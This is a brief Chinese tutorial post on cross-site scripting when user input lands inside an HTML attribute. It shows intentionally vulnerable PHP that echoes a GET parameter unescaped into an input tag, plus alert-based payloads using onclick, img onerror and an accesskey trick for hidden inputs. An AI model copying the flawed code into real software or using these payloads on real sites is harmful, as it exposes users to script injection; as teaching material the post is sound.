XSS输出点在属性内

Posted KeepPassion

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS输出点在属性内相关的知识,希望对你有一定的参考价值。

ww缺陷代码:

<?php $name= $_GET['n']; echo"<input type=text value=".$name."></input>";?>


Payload: 
w" onclick=alert(/xss/)w" ><imgsrc=1 onerror=alert(/xss/)>

 

当type类型为hidden时
缺陷代码: 
<?php $name= $_GET['n']; echo"<input type=hidden value=".$name."></input>";?>

想在标签内触发可使用accesskey属性,规定激活(使元素获得焦点)元素的快捷键

 

payload:

w" accesskey=”x”onclick=alert(/xss/)
按键“shift+alt+x”触发


 


以上是关于XSS输出点在属性内的主要内容,如果未能解决你的问题,请参考以下文章

XSS注入方式

将多个输出中的hls属性设置为单独的片段代码

XSS:如何从 C# 中的字符串中删除 JS 片段?

通过脚本片段绕过XSS防御

前端安全

如何判断点在一个区域内?用户绘制区域(射线法)判断点在多边形区域,报警区域